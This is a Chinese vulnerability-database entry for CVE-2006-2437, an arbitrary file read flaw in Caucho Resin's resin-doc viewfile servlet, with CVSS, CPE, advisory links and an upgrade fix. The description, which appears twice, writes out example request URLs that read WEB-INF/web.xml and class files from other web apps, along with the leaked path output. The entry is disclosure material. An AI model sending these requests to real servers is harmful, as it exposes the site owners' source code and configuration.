CVE-2006-2437
CVSS5.0
发布时间 :2006-05-17 06:06:00
修订时间 :2011-03-07 21:36:12
NMCO    

[原文]The viewfile servlet in the documentation package (resin-doc) for Caucho Resin 3.0.17 and 3.0.18 allows remote attackers to obtain the source code for file under the web root via the file parameter.


[CNNVD]Caucho Resin 某CGI程序 输入验证漏洞(CNNVD-200605-322)

        Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windos操作系统下。
        Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
        默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
        http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic &servletpath=%2Findex.xtp &file=index.jsp &re-marker= &re-start= &re-end=#code-highlight
        viewfile servlet可以无需参数在Web主目录中浏览任意文件:
        http://targetsystem/resin-doc/viewfile/?file=index.jsp
        攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
        http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp &servletpath= &file=WEB-INF/web.xml
        如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
        http://targetsystem/resin-doc/viewfile/?contextpath=/ &servletpath= &file=WEB-INF/classes/com/webapp/app/target.class
        请求中错误的路径还会泄漏安装的绝对路径:
        File not found
        /C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:caucho_technology:resin:3.0.17
cpe:/a:caucho_technology:resin:3.0.18

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2437
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2437
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-322
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18007
(PATCH)  BID  18007
http://www.vupen.com/english/advisories/2006/1831
(UNKNOWN)  VUPEN  ADV-2006-1831
http://www.securityfocus.com/archive/1/434145
(UNKNOWN)  BUGTRAQ  20060516 ScanAlert Security Advisory
http://securityreason.com/securityalert/908
(UNKNOWN)  SREASON  908
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0384.html
(UNKNOWN)  FULLDISC  20060516 ScanAlert Security Advisory

- 漏洞信息

Caucho Resin 某CGI程序 输入验证漏洞
中危 输入验证
2006-05-17 00:00:00 2006-05-18 00:00:00
远程  
        Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windos操作系统下。
        Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
        默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
        http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic &servletpath=%2Findex.xtp &file=index.jsp &re-marker= &re-start= &re-end=#code-highlight
        viewfile servlet可以无需参数在Web主目录中浏览任意文件:
        http://targetsystem/resin-doc/viewfile/?file=index.jsp
        攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
        http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp &servletpath= &file=WEB-INF/web.xml
        如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
        http://targetsystem/resin-doc/viewfile/?contextpath=/ &servletpath= &file=WEB-INF/classes/com/webapp/app/target.class
        请求中错误的路径还会泄漏安装的绝对路径:
        File not found
        /C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.caucho.com/download/

- 漏洞信息

25571
Caucho Resin viewfile Servlet Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

Caucho Resin contains a flaw that allows a remote attacker to disclose the content of arbitrary files stored within a defined web root. The issue is due to the viewfile not properly sanitizing user input, specifically directory traversal style attacks (../../) supplied via the "contextpath" and "file" variables.

- 时间线

2006-05-17 Unknow
2006-05-17 Unknow

- 解决方案

Upgrade to version 3.0.19 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站